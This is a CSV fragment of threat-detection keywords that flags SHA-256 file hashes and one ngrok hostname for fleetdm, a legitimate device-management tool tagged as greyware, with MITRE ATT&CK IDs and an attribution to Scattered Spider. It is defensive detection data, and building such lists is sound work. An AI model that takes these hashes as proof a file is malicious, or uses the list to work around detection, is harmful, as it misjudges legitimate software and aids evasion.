"*56f939d7b5513df64ad63f7bf2da6cafa98778872aecfbce5f55161648ca4231*",".{0,1000}56f939d7b5513df64ad63f7bf2da6cafa98778872aecfbce5f55161648ca4231.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*59d935b141966f1706eaf690c8937ef1f4a75303b2852f3fcbd6b77d1287d744*",".{0,1000}59d935b141966f1706eaf690c8937ef1f4a75303b2852f3fcbd6b77d1287d744.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*5a65d7c3fda43337fd1422f92403901a460c12a37f89da6cb70833802a2f1c9b*",".{0,1000}5a65d7c3fda43337fd1422f92403901a460c12a37f89da6cb70833802a2f1c9b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*5b0b491a401d5031b75aaa1bfe8ab32d55befb03d7cb627de72409fce0b5a103*",".{0,1000}5b0b491a401d5031b75aaa1bfe8ab32d55befb03d7cb627de72409fce0b5a103.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*5dc1924bef12ac4d6b3a428b16f92545e54a4f2a53ccf416f327cab35eed20b5*",".{0,1000}5dc1924bef12ac4d6b3a428b16f92545e54a4f2a53ccf416f327cab35eed20b5.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*5e7401fba3d86958c0efddc44addbba7dd34e629ba47501445f1bb9db88eb52a*",".{0,1000}5e7401fba3d86958c0efddc44addbba7dd34e629ba47501445f1bb9db88eb52a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*625ae9460120.ngrok.io*",".{0,1000}625ae9460120\.ngrok\.io.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*635c9083e14310cee41e7f5caaa91249130280aca25911346a82e5edbbbeebf9*",".{0,1000}635c9083e14310cee41e7f5caaa91249130280aca25911346a82e5edbbbeebf9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*639d2a5d5cab0b60d2f2d22c835f997db1b16cf5ac4a8d88f3c91d43247d359d*",".{0,1000}639d2a5d5cab0b60d2f2d22c835f997db1b16cf5ac4a8d88f3c91d43247d359d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*65f081caa613ba53342c9c3dd7188f22552b83c9e8ac73f740321f99f6a9fe5b*",".{0,1000}65f081caa613ba53342c9c3dd7188f22552b83c9e8ac73f740321f99f6a9fe5b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*69ea24257c033294c33d7bb036d7ea550a75d00c2313c6d4ef25126b67d7a574*",".{0,1000}69ea24257c033294c33d7bb036d7ea550a75d00c2313c6d4ef25126b67d7a574.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*69fd60793b4333e2c0fd80f36d293b6eea6cd3b8f3761b65b7074ef1d812fab9*",".{0,1000}69fd60793b4333e2c0fd80f36d293b6eea6cd3b8f3761b65b7074ef1d812fab9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*6b5f393778459329dbdc69151a3492bb3f18b798bc6e9a7707219923b2a0aab9*",".{0,1000}6b5f393778459329dbdc69151a3492bb3f18b798bc6e9a7707219923b2a0aab9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*6d331a0cf4808cc0a5141960acfe009d99e5b6e33b477216c9e888d55a04885e*",".{0,1000}6d331a0cf4808cc0a5141960acfe009d99e5b6e33b477216c9e888d55a04885e.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*6de3528cac2c68c0f14a98474db820bb8291b49ab63727e52d58d29288af3fa7*",".{0,1000}6de3528cac2c68c0f14a98474db820bb8291b49ab63727e52d58d29288af3fa7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*6e12d0f2f68b89133032436717f20a60bc8b9b0e116f2985e658dfb0f1e46066*",".{0,1000}6e12d0f2f68b89133032436717f20a60bc8b9b0e116f2985e658dfb0f1e46066.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*6ebf021ec1ecf18a97b59fcf9c045aa245120b84a84a5319dbbc5ff4c34f42ee*",".{0,1000}6ebf021ec1ecf18a97b59fcf9c045aa245120b84a84a5319dbbc5ff4c34f42ee.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*70f7f49337d31968d4a2b7eb27200bced44eade5ba5c75547bd1f9a51660f2d5*",".{0,1000}70f7f49337d31968d4a2b7eb27200bced44eade5ba5c75547bd1f9a51660f2d5.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*710c8601b26a63482c9d8044bfb12d8dec9297aaa593942cb68185276dd304b6*",".{0,1000}710c8601b26a63482c9d8044bfb12d8dec9297aaa593942cb68185276dd304b6.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*72d4be0337fe92dda02f3828e2f1f7df290a1c079e81ef3873d9c0502bbe90a3*",".{0,1000}72d4be0337fe92dda02f3828e2f1f7df290a1c079e81ef3873d9c0502bbe90a3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*74d130cad8acef03e4faa3b5befcb1351db038fa47421d6a5d3010f583ab0e47*",".{0,1000}74d130cad8acef03e4faa3b5befcb1351db038fa47421d6a5d3010f583ab0e47.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*763e2f8597ef969c08a17932f0d4e10424b478314ceddbf72ba13a5d41aa8df0*",".{0,1000}763e2f8597ef969c08a17932f0d4e10424b478314ceddbf72ba13a5d41aa8df0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*770ca5efa95e4c0a44f8f1653c41d79c9fe55d0e9a228eb2d374bdd8a11a63f7*",".{0,1000}770ca5efa95e4c0a44f8f1653c41d79c9fe55d0e9a228eb2d374bdd8a11a63f7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*7a64765efe8fe0d9f6a346e5f38aae30a3534f931e539890114aea698d8960cb*",".{0,1000}7a64765efe8fe0d9f6a346e5f38aae30a3534f931e539890114aea698d8960cb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*7b5de4f0a090f29dd3d63a3d773b792cb059e2b39497ff4d633fcabb2afbc297*",".{0,1000}7b5de4f0a090f29dd3d63a3d773b792cb059e2b39497ff4d633fcabb2afbc297.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*7b89ba929cc86c0b945cef5168476ba82ac80d19c9c2111d816643eb453cb14d*",".{0,1000}7b89ba929cc86c0b945cef5168476ba82ac80d19c9c2111d816643eb453cb14d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*7c26189a98e1b82293fa72a8a88725ecce3d38622480e5809b8bec9fca407ab1*",".{0,1000}7c26189a98e1b82293fa72a8a88725ecce3d38622480e5809b8bec9fca407ab1.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*7d49e7215481d044c66c2af30c063b4253e2086be6b20f6c99142ad3b6fb4fbe*",".{0,1000}7d49e7215481d044c66c2af30c063b4253e2086be6b20f6c99142ad3b6fb4fbe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*7d602aa3b76b0aae9dd6771e6451d3aa23b89f46ff115b0096b9074d110e2877*",".{0,1000}7d602aa3b76b0aae9dd6771e6451d3aa23b89f46ff115b0096b9074d110e2877.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*7d739b6a0667be4e84dff7ad01ae6db2369aac0bb8685d1eafb74a239cf3dde4*",".{0,1000}7d739b6a0667be4e84dff7ad01ae6db2369aac0bb8685d1eafb74a239cf3dde4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*7f08d1c537cc683674c8b85e02ba5ae0513a779fc416c687f82a1b0eba4010d8*",".{0,1000}7f08d1c537cc683674c8b85e02ba5ae0513a779fc416c687f82a1b0eba4010d8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*7fab6b56cc09d922c7160833d912a2a23ac61ae9d6dc1156d8228bc2c03f5059*",".{0,1000}7fab6b56cc09d922c7160833d912a2a23ac61ae9d6dc1156d8228bc2c03f5059.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*80cd76926ec4cf711da761f81d469824ebfc21388b3e062fee509ea087f23a5a*",".{0,1000}80cd76926ec4cf711da761f81d469824ebfc21388b3e062fee509ea087f23a5a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*811febc6169517fbd42233cdc003fcaf660f1ee969fcea98261647274ae27f2a*",".{0,1000}811febc6169517fbd42233cdc003fcaf660f1ee969fcea98261647274ae27f2a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*81336615ec3491b5ef7770fefaaa4c955dc1bc123d79bb90b24a86989c95aa86*",".{0,1000}81336615ec3491b5ef7770fefaaa4c955dc1bc123d79bb90b24a86989c95aa86.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*82d32160a4bc234ba3e1d34412e65ee7a74c904df4156a896f71c422a103abd6*",".{0,1000}82d32160a4bc234ba3e1d34412e65ee7a74c904df4156a896f71c422a103abd6.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*84bd394d27a36a89e86a265dd05d14d4747f16ec916044fec21ec113bf96a1c4*",".{0,1000}84bd394d27a36a89e86a265dd05d14d4747f16ec916044fec21ec113bf96a1c4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*85f0b24d9e734c48dfe285aece6b7decb23eaa976590245adf67e43b1bc222d1*",".{0,1000}85f0b24d9e734c48dfe285aece6b7decb23eaa976590245adf67e43b1bc222d1.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*86f533145306e79ccdbe21d0b46326ae9fab9507f3a1740d0ffc8a088ce18d02*",".{0,1000}86f533145306e79ccdbe21d0b46326ae9fab9507f3a1740d0ffc8a088ce18d02.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*87759dcbffdc166d166545937d55787701b69197a7138ac01850f661f2dceed4*",".{0,1000}87759dcbffdc166d166545937d55787701b69197a7138ac01850f661f2dceed4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*881f6c9e3c1e70dd076b850c146352b733957e1ef90a76c46595631f2cd5ff7c*",".{0,1000}881f6c9e3c1e70dd076b850c146352b733957e1ef90a76c46595631f2cd5ff7c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*8a51f608a0c289334d341590a8b59fce757f07fd112aaa5459fc9c51891b5e60*",".{0,1000}8a51f608a0c289334d341590a8b59fce757f07fd112aaa5459fc9c51891b5e60.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*8a589ad4b3ec87077fb149d95a7c53d4a9422c2270b8d83a17c2ae0e2bcc816f*",".{0,1000}8a589ad4b3ec87077fb149d95a7c53d4a9422c2270b8d83a17c2ae0e2bcc816f.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*8a9035a8ebb7500049aacb7291c559d29a2db2024cfdac39fbdd6ff277dc2764*",".{0,1000}8a9035a8ebb7500049aacb7291c559d29a2db2024cfdac39fbdd6ff277dc2764.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*8c1b2481e4dfe27c73d6446784fae2b9d2c7d27c11e0a19b081e877a38d08c94*",".{0,1000}8c1b2481e4dfe27c73d6446784fae2b9d2c7d27c11e0a19b081e877a38d08c94.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*8c38c4c17d8d8382d9fe1f98db556bca3cfeb3fef0359d9d7c01ab73477b4a48*",".{0,1000}8c38c4c17d8d8382d9fe1f98db556bca3cfeb3fef0359d9d7c01ab73477b4a48.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*8d16dbb3c90052e4a2644008d40b65813912d7b117ab6f8c65e886f2881361c2*",".{0,1000}8d16dbb3c90052e4a2644008d40b65813912d7b117ab6f8c65e886f2881361c2.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*8ddb38319fb34f580a0f3732fcf3f40b13c2b562fd676b189481e1cc0e361381*",".{0,1000}8ddb38319fb34f580a0f3732fcf3f40b13c2b562fd676b189481e1cc0e361381.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*8f798e081ea1cb1e106552ab9a7241994d3c05dd18970f3e1ad8329d3738bd7e*",".{0,1000}8f798e081ea1cb1e106552ab9a7241994d3c05dd18970f3e1ad8329d3738bd7e.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*9043fcb49a3326bc9887c4a8cff27560c53edf4792fc94024f756a5791da38a8*",".{0,1000}9043fcb49a3326bc9887c4a8cff27560c53edf4792fc94024f756a5791da38a8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*9147ff5871fe6cfb56f5ad85e69570ef5d904a20b4cf8135a59ea687e9efe7b0*",".{0,1000}9147ff5871fe6cfb56f5ad85e69570ef5d904a20b4cf8135a59ea687e9efe7b0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*917759e1b76b72229b5dc928b07af4a4d1f99b41111da42580aeb28ef2aefd3e*",".{0,1000}917759e1b76b72229b5dc928b07af4a4d1f99b41111da42580aeb28ef2aefd3e.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*91aceb4ee71ac847521007ac796e718ad5bb6577c28b5c992e810e2f4e402046*",".{0,1000}91aceb4ee71ac847521007ac796e718ad5bb6577c28b5c992e810e2f4e402046.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*91e7b6bf8831219775f176389103295d7065a7e6eb74c68c1093416be508ba14*",".{0,1000}91e7b6bf8831219775f176389103295d7065a7e6eb74c68c1093416be508ba14.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*92dfe587c369ed8afad29bcb4ae5ed9a313cb563b2e52ff0b0494f15dcd5fd33*",".{0,1000}92dfe587c369ed8afad29bcb4ae5ed9a313cb563b2e52ff0b0494f15dcd5fd33.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*92f34dca0bd5715dbfffcdceeb89ffab9cd8115c2faf07cbd1e34071795cdb44*",".{0,1000}92f34dca0bd5715dbfffcdceeb89ffab9cd8115c2faf07cbd1e34071795cdb44.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*92f9a5bbfd116c4e20227af72b651b95a4190b346cb391762d0d50f5245d3355*",".{0,1000}92f9a5bbfd116c4e20227af72b651b95a4190b346cb391762d0d50f5245d3355.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*94253480a0f1e3be221902d60f94463420057f8d84f9136abd6b7448332a1fe6*",".{0,1000}94253480a0f1e3be221902d60f94463420057f8d84f9136abd6b7448332a1fe6.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*9456bf9d11fd8cee55619fc0a2ffe3443f9bfea51589af5c3b1282dfa50eb2a7*",".{0,1000}9456bf9d11fd8cee55619fc0a2ffe3443f9bfea51589af5c3b1282dfa50eb2a7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*947895eee1492a0f6da5c69fe68361b97359f52f99ac72f7947a456618f0ec7f*",".{0,1000}947895eee1492a0f6da5c69fe68361b97359f52f99ac72f7947a456618f0ec7f.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*9506632b80989310f2d2cca6a35e036d21213776cfff6623c28f1c5d3b8588c7*",".{0,1000}9506632b80989310f2d2cca6a35e036d21213776cfff6623c28f1c5d3b8588c7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
